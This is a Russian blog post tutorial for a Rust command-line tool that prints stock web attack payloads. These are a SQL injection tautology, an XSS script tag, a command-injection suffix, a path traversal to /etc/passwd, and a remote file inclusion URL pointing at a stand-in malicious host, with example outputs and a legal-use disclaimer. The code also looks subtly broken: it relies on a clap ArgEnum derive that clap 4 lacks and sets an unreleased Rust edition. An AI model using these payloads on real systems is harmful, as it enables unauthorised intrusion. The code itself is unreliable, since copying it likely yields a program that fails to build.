Главная страница » Блог » [Мои инструменты] — Генератор пейлоадов, на языке программирования Rust

[Мои инструменты] — Генератор пейлоадов, на языке программирования Rust

Mikhail Tarasov
14 сентября, 2024

Создание генератора пейлоадов на языке Rust — отличный способ автоматизировать процесс тестирования уязвимостей, таких как SQL-инъекции и XSS. Ниже представлен пример такого инструмента с возможностью настройки параметров пейлоадов. Этот инструмент использует аргументы командной строки для выбора типа пейлоада и настройки его параметров.

Шаг 1: Настройка проекта

Сначала создайте новый проект на Rust:

cargo new payload_generator 
cd payload_generator

1 2	cargo new payload_generator cd payload_generator

Шаг 2: Добавление зависимостей

Откройте файл Cargo.toml и добавьте необходимые зависимости. Мы будем использовать библиотеку clap для обработки аргументов командной строки и rand для генерации случайных данных, если это потребуется.

[package]
name = "payload_generator"
version = "0.1.0"
edition = "2024"

[dependencies]
clap = { version = "4.1.6", features = ["derive"] }
rand = "0.8"

[package]

name = "payload_generator"

version = "0.1.0"

edition = "2024"

[dependencies]

clap = { version = "4.1.6", features = ["derive"] }

rand = "0.8"

Шаг 3: Реализация генератора пейлоадов

Замените содержимое файла src/main.rs следующим кодом:

use clap::{Arg, ArgEnum, Command};
use rand::Rng;
use std::fmt;

// Определение типов пейлоадов
#[derive(ArgEnum, Clone, Debug)]
enum PayloadType {
    SqlInjection,
    Xss,
    CmdInjection,
    Lfi,
    Rfi,
}

// Структура для параметров пейлоада
struct PayloadOptions {
    payload_type: PayloadType,
    complexity: usize,
    custom_string: Option<String>,
}

// Реализация генерации пейлоадов
impl PayloadOptions {
    fn generate(&self) -> String {
        match self.payload_type {
            PayloadType::SqlInjection => self.generate_sql_injection(),
            PayloadType::Xss => self.generate_xss(),
            PayloadType::CmdInjection => self.generate_cmd_injection(),
            PayloadType::Lfi => self.generate_lfi(),
            PayloadType::Rfi => self.generate_rfi(),
        }
    }

    fn generate_sql_injection(&self) -> String {
        let base = "' OR '1'='1";
        if let Some(custom) = &self.custom_string {
            format!("{}{}", base, custom)
        } else {
            base.to_string()
        }
    }

    fn generate_xss(&self) -> String {
        let base = "<script>alert('XSS');</script>";
        if let Some(custom) = &self.custom_string {
            format!("{}{}", base, custom)
        } else {
            base.to_string()
        }
    }

    fn generate_cmd_injection(&self) -> String {
        let base = ";& ls -la";
        if let Some(custom) = &self.custom_string {
            format!("{}{}", base, custom)
        } else {
            base.to_string()
        }
    }

    fn generate_lfi(&self) -> String {
        let base = "../../../../etc/passwd";
        if let Some(custom) = &self.custom_string {
            format!("{}{}", base, custom)
        } else {
            base.to_string()
        }
    }

    fn generate_rfi(&self) -> String {
        let base = "http://malicious.com/shell.php";
        if let Some(custom) = &self.custom_string {
            format!("{}{}", base, custom)
        } else {
            base.to_string()
        }
    }
}

fn main() {
    let matches = Command::new("Payload Generator")
        .version("1.0")
        .author("Ваше Имя <email@example.com>")
        .about("Генерирует различные типы пейлоадов для тестирования уязвимостей")
        .arg(
            Arg::new("type")
                .short('t')
                .long("type")
                .help("Тип пейлоада")
                .required(true)
                .value_parser(clap::builder::PossibleValuesParser::new([
                    "sql-injection",
                    "xss",
                    "cmd-injection",
                    "lfi",
                    "rfi",
                ]))
                .action(clap::ArgAction::Set),
        )
        .arg(
            Arg::new("complexity")
                .short('c')
                .long("complexity")
                .help("Уровень сложности пейлоада")
                .required(false)
                .default_value("1")
                .value_parser(clap::value_parser!(usize)),
        )
        .arg(
            Arg::new("custom")
                .short('s')
                .long("custom")
                .help("Пользовательская строка для пейлоада")
                .required(false)
                .value_parser(clap::builder::NonEmptyStringValueParser::new()),
        )
        .get_matches();

    // Получение типа пейлоада
    let payload_type = match matches.get_one::<String>("type").map(|s| s.as_str()) {
        Some("sql-injection") => PayloadType::SqlInjection,
        Some("xss") => PayloadType::Xss,
        Some("cmd-injection") => PayloadType::CmdInjection,
        Some("lfi") => PayloadType::Lfi,
        Some("rfi") => PayloadType::Rfi,
        _ => {
            eprintln!("Неизвестный тип пейлоада");
            std::process::exit(1);
        }
    };

    // Получение уровня сложности
    let complexity = *matches.get_one::<usize>("complexity").unwrap();

    // Получение пользовательской строки
    let custom_string = matches.get_one::<String>("custom").cloned();

    let options = PayloadOptions {
        payload_type,
        complexity,
        custom_string,
    };

    let payload = options.generate();

    println!("Сгенерированный пейлоад:\n{}", payload);
}

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

use clap::{Arg, ArgEnum, Command};

use rand::Rng;

use std::fmt;

// Определение типов пейлоадов

#[derive(ArgEnum, Clone, Debug)]

enum PayloadType {

SqlInjection,

Xss,

CmdInjection,

Lfi,

Rfi,

}

// Структура для параметров пейлоада

struct PayloadOptions {

payload_type: PayloadType,

complexity: usize,

custom_string: Option<String>,

}

// Реализация генерации пейлоадов

impl PayloadOptions {

fn generate(&self) -> String {

match self.payload_type {

PayloadType::SqlInjection => self.generate_sql_injection(),

PayloadType::Xss => self.generate_xss(),

PayloadType::CmdInjection => self.generate_cmd_injection(),

PayloadType::Lfi => self.generate_lfi(),

PayloadType::Rfi => self.generate_rfi(),

}

fn generate_sql_injection(&self) -> String {

let base = "' OR '1'='1";

if let Some(custom) = &self.custom_string {

format!("{}{}", base, custom)

} else {

base.to_string()

}

fn generate_xss(&self) -> String {

let base = "<script>alert('XSS');</script>";

if let Some(custom) = &self.custom_string {

format!("{}{}", base, custom)

} else {

base.to_string()

}

fn generate_cmd_injection(&self) -> String {

let base = ";& ls -la";

if let Some(custom) = &self.custom_string {

format!("{}{}", base, custom)

} else {

base.to_string()

}

fn generate_lfi(&self) -> String {

let base = "../../../../etc/passwd";

if let Some(custom) = &self.custom_string {

format!("{}{}", base, custom)

} else {

base.to_string()

}

fn generate_rfi(&self) -> String {

let base = "http://malicious.com/shell.php";

if let Some(custom) = &self.custom_string {

format!("{}{}", base, custom)

} else {

base.to_string()

}

fn main() {

let matches = Command::new("Payload Generator")

.version("1.0")

.author("Ваше Имя <email@example.com>")

.about("Генерирует различные типы пейлоадов для тестирования уязвимостей")

.arg(

Arg::new("type")

.short('t')

.long("type")

.help("Тип пейлоада")

.required(true)

.value_parser(clap::builder::PossibleValuesParser::new([

"sql-injection",

"xss",

"cmd-injection",

"lfi",

"rfi",

]))

.action(clap::ArgAction::Set),

)

.arg(

Arg::new("complexity")

.short('c')

.long("complexity")

.help("Уровень сложности пейлоада")

.required(false)

.default_value("1")

.value_parser(clap::value_parser!(usize)),

)

.arg(

Arg::new("custom")

.short('s')

.long("custom")

.help("Пользовательская строка для пейлоада")

.required(false)

.value_parser(clap::builder::NonEmptyStringValueParser::new()),

)

.get_matches();

// Получение типа пейлоада

let payload_type = match matches.get_one::<String>("type").map(|s| s.as_str()) {

Some("sql-injection") => PayloadType::SqlInjection,

Some("xss") => PayloadType::Xss,

Some("cmd-injection") => PayloadType::CmdInjection,

Some("lfi") => PayloadType::Lfi,

Some("rfi") => PayloadType::Rfi,

_ => {

eprintln!("Неизвестный тип пейлоада");

std::process::exit(1);

}

};

// Получение уровня сложности

let complexity = *matches.get_one::<usize>("complexity").unwrap();

// Получение пользовательской строки

let custom_string = matches.get_one::<String>("custom").cloned();

let options = PayloadOptions {

payload_type,

complexity,

custom_string,

};

let payload = options.generate();

println!("Сгенерированный пейлоад:\n{}", payload);

}

Шаг 4: Компиляция и использование

Соберите проект:

cargo build --release<code>

1	cargo build --release<code>

Использование генератора:

./target/release/payload_generator --type <TYPE> [--complexity <LEVEL>] [--custom <STRING>]<code>

1	./target/release/payload_generator --type <TYPE> [--complexity <LEVEL>] [--custom <STRING>]<code>

Примеры:

Генерация SQL-инъекции:

./target/release/payload_generator --type sql-injection<code>

1	./target/release/payload_generator --type sql-injection<code>

Вывод:

Сгенерированный пейлоад:
' OR '1'='1

1 2	Сгенерированный пейлоад: ' OR '1'='1

Генерация XSS с пользовательской строкой:

./target/release/payload_generator --type xss --custom "alert('Custom');"<code>

1	./target/release/payload_generator --type xss --custom "alert('Custom');"<code>

Вывод:

Сгенерированный пейлоад:
<script>alert('XSS');</script>alert('Custom');

1 2	Сгенерированный пейлоад: <script>alert('XSS');</script>alert('Custom');

Генерация LFI:

./target/release/payload_generator --type lfi<code>

1	./target/release/payload_generator --type lfi<code>

Вывод:

Сгенерированный пейлоад:
../../../../etc/passwd

1 2	Сгенерированный пейлоад: ../../../../etc/passwd

Расширение функциональности

Вы можете расширить генератор, добавляя новые типы пейлоадов и улучшая существующие. Например, можно добавить генерацию более сложных SQL-инъекций в зависимости от уровня сложности или интегрировать случайную генерацию некоторых частей пейлоада для повышения разнообразия.

Также можно добавить поддержку вывода в файл или интеграции с другими инструментами тестирования безопасности.

Важное замечание

Этот инструмент предназначен для использования только в легитимных целях, таких как тестирование безопасности ваших собственных систем или систем, для которых у вас есть разрешение на проведение тестирования. Незаконное использование может привести к серьезным правовым последствиям.